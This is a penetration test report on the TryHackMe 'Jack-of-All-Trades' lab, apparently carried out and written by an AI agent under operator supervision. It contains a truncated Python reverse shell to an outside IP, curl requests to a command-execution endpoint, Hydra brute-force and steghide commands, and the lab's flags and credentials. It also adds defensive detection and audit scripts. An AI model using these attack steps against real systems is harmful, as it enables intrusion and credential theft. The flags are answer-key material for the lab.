Jack-of-All-Trades
Penetration Test Report
Jack-of-All-Trades — TryHackMe Lab
Date: April 25, 2026
Operator: wintermute
Executing Agent: Anthropic Claude Opus 4.7 (model ID claude-opus-4-7, 1M-context variant), running in Claude Code on Kali Linux
Difficulty: Easy
Target IP: 10.65.146.188
Scope: Single host, all ports
AI Authorship Disclosure
This engagement was carried out by an autonomous AI agent (Anthropic Claude Opus 4.7) operating from the operator's workstation under the alias above. The AI performed all reconnaissance, exploitation, flag capture, and authored this report end-to-end. The human operator supplied the target, authorised the scope (the TryHackMe lab in question), and supervised execution; no third-party systems were touched. All tool invocations (nmap, autorecon, curl, hydra, steghide, netcat, etc.) were issued by the agent via shell. Findings, payloads, and recommendations have not been independently re-verified by a human reviewer.
Executive Summary
A penetration test was conducted against the target host 10.65.146.188. The assessment identified multiple critical vulnerabilities including credential exposure via HTML source code, hidden data in image files (steganography), an unauthenticated remote code execution endpoint, SSH credential disclosure via a world-readable password list, and a SUID misconfiguration enabling full system compromise. Full root-level access was achieved.
Scope & Objectives
| Item | Detail |
|---|---|
| Target | 10.65.146.188 |
| Ports in Scope | All TCP/UDP |
| Objective | Identify and exploit vulnerabilities; capture user and root flags |
| Tools Used | nmap, autorecon, curl, steghide, hydra, netcat |
Findings Summary
| # | Vulnerability | Severity | CVSS |
|---|---|---|---|
| 1 | Credentials Exposed in HTML Source | Critical | 9.1 |
| 2 | Sensitive Data Hidden in Image (Steganography) | High | 7.5 |
| 3 | Unauthenticated Remote Code Execution | Critical | 9.8 |
| 4 | World-Readable Password List | High | 8.1 |
| 5 | SUID Misconfiguration (strings) | High | 7.8 |
| 6 | Non-Standard Service Ports | Informational | — |
Reconnaissance
Port Scan — nmap
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
Notable: Services were deliberately swapped — HTTP ran on port 22 and SSH on port 80. This is security through obscurity and provides no meaningful protection.
OS / Kernel: Linux 3.16.0-4-amd64 (Debian, 2015) — significantly outdated.
Attack Chain
Step 1 — Credential Disclosure in HTML Source (Critical)
Browsing the homepage at http://10.65.146.188:22/ revealed two HTML comments:
Comment 1 — Recovery endpoint:
<!-- Note to self - If I ever get locked out I can get back in at /recovery.php! -->
Comment 2 — Base64 encoded string:
UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9i...
Decoded:
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems
are amazing! Also gotta remember your password: u?WtKSraq
Credentials obtained: u?WtKSraq
Step 2 — Steganography: CMS Credentials in header.jpg (High)
The /recovery.php page contained a Base32-encoded comment that decoded (via Base32 → Hex → ROT13) to:
> "Remember that the credentials to the recovery login are hidden on the homepage!"
Using the password u?WtKSraq with steghide against header.jpg:
steghide extract -sf header.jpg -p "u?WtKSraq"
Extracted file cms.creds:
Username: jackinthebox
Password: TplFxiSHjY
Step 3 — Remote Code Execution via Hidden CMS (Critical)
Authenticating to /recovery.php with jackinthebox:TplFxiSHjY redirected to a hidden endpoint:
/nnxhweOV/index.php
This page accepted a cmd GET parameter and executed arbitrary OS commands as www-data:
curl "http://10.65.146.188:22/nnxhweOV/index.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
A Python reverse shell was used to establish an interactive session:
python -c "import socket,subprocess,os;s=socket.socket(...);s.connect(('192.168.236.254',4444));..."
Step 4 — World-Readable Password List (High)
Enumeration of the filesystem revealed /home/jacks_password_list — a plaintext file containing 24 passwords, readable by all users including www-data.
SSH on port 80 was brute-forced using Hydra:
hydra -l jack -P jacks_password_list ssh://10.65.146.188:80 -t 4
Result: jack:ITMJpGGIqg1jn?>@
Step 5 — Privilege Escalation via SUID strings (High)
Enumeration of SUID binaries revealed an unusual entry:
find / -perm -4000 -type f 2>/dev/null
# /usr/bin/strings
strings is a standard text extraction utility with no legitimate reason to carry the SUID bit. Because the SUID bit makes it execute with its owner's (root's) privileges, it can read any file on the system regardless of permissions:
/usr/bin/strings /root/root.txt
This disclosed the root flag and full contents of /root/root.txt.
Flags
| Flag | Value |
|---|---|
| User | securi-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3} |
| Root | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} |
Vulnerabilities & Recommendations
1. Credentials Exposed in HTML Source — Critical
Description: Plaintext credentials and sensitive notes were embedded in HTML comments, visible to anyone who views the page source.
Recommendation: Never store credentials, internal paths, or notes in client-facing code. Use server-side session management and remove all debug/development comments before deployment.
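A pre-deployment check for the class of leak described above, added here as an example and not taken from the report or the lab: it pulls every HTML comment out of a page, flags those that mention credentials, recovery paths or lock-outs or that carry a long Base64-looking token, and exits non-zero so a CI job fails before the page ships. The sample page, the keyword list and the 24-character Base64 threshold are constructed assumptions to be tuned per codebase.

```shell
#!/bin/sh
# Deployment gate for HTML comments (added example; constructed sample input).

# Print each <!-- ... --> comment of file $1 on one line, whitespace collapsed.
# Lines are joined first so comments spanning several lines are caught too.
extract_html_comments() {
    tr '\n' ' ' < "$1" \
      | grep -oE '<!--([^-]|-[^-])*-->' \
      | sed -E 's/^<!-- *//; s/ *-->$//; s/  +/ /g'
}

# Succeed (0) when a comment mentions secrets, recovery paths or lock-outs,
# or contains a 24+ character Base64-looking run (assumed thresholds).
looks_sensitive() {
    printf '%s\n' "$1" | grep -qiE 'password|passwd|secret|token|credential|login|locked out|recover|todo|fixme' && return 0
    printf '%s\n' "$1" | grep -qE '[A-Za-z0-9+/]{24,}={0,2}' && return 0
    return 1
}

# Print only the flagged comments of file $1.
flagged_comments() {
    extract_html_comments "$1" | while IFS= read -r c; do
        if looks_sensitive "$c"; then printf '%s\n' "$c"; fi
    done
}

# Number of flagged comments in $1 (0 means the page is clean).
count_flagged() {
    flagged_comments "$1" | wc -l | tr -d ' '
}

# CI gate: return 1 and list the offenders when anything is flagged.
check_html_file() {
    n=$(count_flagged "$1")
    if [ "$n" -gt 0 ]; then
        printf '%s: %s sensitive-looking comment(s) found:\n' "$1" "$n"
        flagged_comments "$1"
        return 1
    fi
    return 0
}

# --- constructed sample page (not the lab's real source) ---
SAMPLE_HTML=$(mktemp)
cat > "$SAMPLE_HTML" <<'EOF'
<html><body>
<!-- Note to self: if locked out, use /recovery.php - password is hunter2 -->
<!-- layout: two-column grid, see style.css -->
<!-- VGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNhbXBsZQ== -->
<p>Welcome to the site.</p>
</body></html>
EOF

check_html_file "$SAMPLE_HTML" || echo "deployment gate would fail here"
```

Run against the build output directory (for example `for f in dist/*.html; do check_html_file "$f"; done`) and let the non-zero exit fail the pipeline; the layout comment passes, the note with a password and the bare Base64 blob do not.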
2. Sensitive Data in Images (Steganography) — High
Description: CMS credentials were hidden inside header.jpg using steghide. While steganography obscures data, it is not encryption and provides weak protection, especially when the passphrase is already exposed.
Recommendation: Do not use steganography as a credential storage mechanism. Store credentials in a secrets manager (e.g., HashiCorp Vault, AWS Secrets Manager).
3. Unauthenticated Remote Code Execution — Critical
Description: The CMS at /nnxhweOV/index.php passed user-supplied input directly to a system shell via the cmd GET parameter with no sanitisation, authentication enforcement, or rate limiting.
Recommendation: Remove or properly authenticate all administrative endpoints. Never pass user-controlled input to shell execution functions. Implement a WAF for additional defence-in-depth.
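Detection logic for requests against an endpoint like the one above, written as an added example and not the report's or the lab's code. It assumes Apache combined log format (field 1 client, field 4 timestamp, field 7 request path) and runs over constructed sample lines; the parameter names and the metacharacter list are assumptions a real deployment would extend.

```shell
#!/bin/sh
# Command-injection triage over web-server access logs (added example).

# Print "client timestamp reason path" for each suspicious request in log $1.
# reason is cmd-param (query names a command-style parameter) or shell-meta
# (query carries ; | && ` $( literally or percent-encoded).
detect_cmd_injection() {
    awk '
    {
        path = $7
        q = ""
        i = index(path, "?")
        if (i > 0) q = tolower(substr(path, i + 1))
        reason = ""
        # parameter names that commonly reach a shell in home-grown admin pages (assumed list)
        if (q ~ /(^|&)(cmd|exec|command|run|shell)=/) reason = "cmd-param"
        # shell metacharacters, plain or URL-encoded
        else if (q ~ /%3b|%7c|%26%26|%60|%24%28|;|\||&&|`|\$\(/) reason = "shell-meta"
        if (reason != "") print $1, $4, reason, path
    }' "$1"
}

# Count of suspicious requests in $1 (0 means nothing flagged).
count_cmd_injection() {
    detect_cmd_injection "$1" | wc -l | tr -d ' '
}

# Distinct clients that sent at least one flagged request, for triage.
flagged_clients() {
    detect_cmd_injection "$1" | awk '{ print $1 }' | sort -u
}

# --- constructed access-log lines (not the lab's real logs) ---
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [25/Apr/2026:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Apr/2026:10:00:02 +0000] "GET /nnxhweOV/index.php?cmd=id HTTP/1.1" 200 61 "-" "curl/8.0"
10.0.0.7 - - [25/Apr/2026:10:00:03 +0000] "GET /nnxhweOV/index.php?cmd=uname%20-a HTTP/1.1" 200 120 "-" "curl/8.0"
10.0.0.9 - - [25/Apr/2026:10:00:04 +0000] "GET /search.php?q=ls%3Bid HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Apr/2026:10:00:05 +0000] "GET /about.php?page=team&lang=en HTTP/1.1" 200 800 "-" "Mozilla/5.0"
EOF

detect_cmd_injection "$SAMPLE_LOG"
echo "flagged clients:"
flagged_clients "$SAMPLE_LOG"
```

The two `cmd=` requests and the `%3B`-encoded one are flagged while ordinary page requests pass; feed the output of `flagged_clients` into the blocklist or the incident ticket, and treat a single hit against an undocumented path such as /nnxhweOV/ as reason to pull the endpoint.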
4. World-Readable Password List — High
Description: /home/jacks_password_list was readable by all users on the system, enabling privilege escalation from www-data to jack via SSH credential brute-forcing.
Recommendation: Never store plaintext password lists on disk. If a credential store is necessary, restrict file permissions (chmod 600) and store it only in the owning user's home directory.
5. SUID Misconfiguration on strings — High
Description: /usr/bin/strings had the SUID bit set, allowing any local user to read arbitrary files as root, bypassing all filesystem permissions.
Recommendation: Audit all SUID binaries regularly. Remove the SUID bit from any binary that does not require it:
chmod u-s /usr/bin/strings
Use tools such as linpeas, pspy, or periodic find / -perm -4000 audits to detect rogue SUID files.
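One script covering recommendations 4 and 5 together, added here as an example rather than taken from the report: it lists SUID files under a search root, compares them with a known-good baseline, and lists world-readable regular files under a home tree, failing when either check finds something. The demo tree, the baseline contents and the file names are constructed; on a real host you would pass / and /home and a baseline recorded from a freshly installed system.

```shell
#!/bin/sh
# Local permission audit for SUID drift and exposed home files (added example).
# Search roots are arguments so the audit can run on a throwaway tree.

# Print every SUID regular file below $1, sorted.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Print SUID files below $1 that are not listed in baseline file $2.
# Every line printed is a candidate for chmod u-s.
unexpected_suid() {
    list_suid "$1" | grep -vxF -f "$2" || true
}

# Print world-readable regular files below $1 (typically a home tree).
world_readable() {
    find "$1" -type f -perm -004 2>/dev/null | sort
}

# Run both checks; return 0 when clean, 1 when anything needs attention.
audit() {
    rc=0
    u=$(unexpected_suid "$1" "$2")
    if [ -n "$u" ]; then printf 'UNEXPECTED SUID:\n%s\n' "$u"; rc=1; fi
    w=$(world_readable "$3")
    if [ -n "$w" ]; then printf 'WORLD-READABLE IN HOME:\n%s\n' "$w"; rc=1; fi
    return $rc
}

# --- constructed demo tree mirroring the two findings ---
DEMO=$(mktemp -d)
mkdir -p "$DEMO/usr/bin" "$DEMO/home/jack"
: > "$DEMO/usr/bin/passwd";  chmod 4755 "$DEMO/usr/bin/passwd"    # legitimately SUID
: > "$DEMO/usr/bin/strings"; chmod 4755 "$DEMO/usr/bin/strings"   # should not be SUID
printf 'hunter2\n' > "$DEMO/home/jacks_password_list"; chmod 644 "$DEMO/home/jacks_password_list"
printf 'private\n' > "$DEMO/home/jack/.notes"; chmod 600 "$DEMO/home/jack/.notes"
BASELINE="$DEMO/suid.baseline"
printf '%s\n' "$DEMO/usr/bin/passwd" > "$BASELINE"   # constructed known-good list

audit "$DEMO/usr" "$BASELINE" "$DEMO/home" || echo "audit: findings above need attention"
```

Record the baseline once (`list_suid / > /etc/suid.baseline`) and run `audit / /etc/suid.baseline /home` from cron; after `chmod u-s` on the stray binary and `chmod 600` on the password file the audit returns 0, which is the state the test below confirms.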
6. Outdated Software & Non-Standard Ports — Informational
Description: The kernel (3.16.0, 2015) and Apache (2.4.10) are significantly out of date and likely vulnerable to known exploits. Running services on non-standard ports provides no meaningful security benefit.
Recommendation: Apply all available security patches. Maintain a regular patching cadence. Do not rely on port obfuscation as a security control.
Appendix — Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| autorecon | Automated multi-tool reconnaissance |
| curl | Web request crafting and RCE interaction |
| steghide | Steganography extraction |
| hydra | SSH credential brute-forcing |
| netcat | Reverse shell listener |
| strings | Flag extraction via SUID abuse |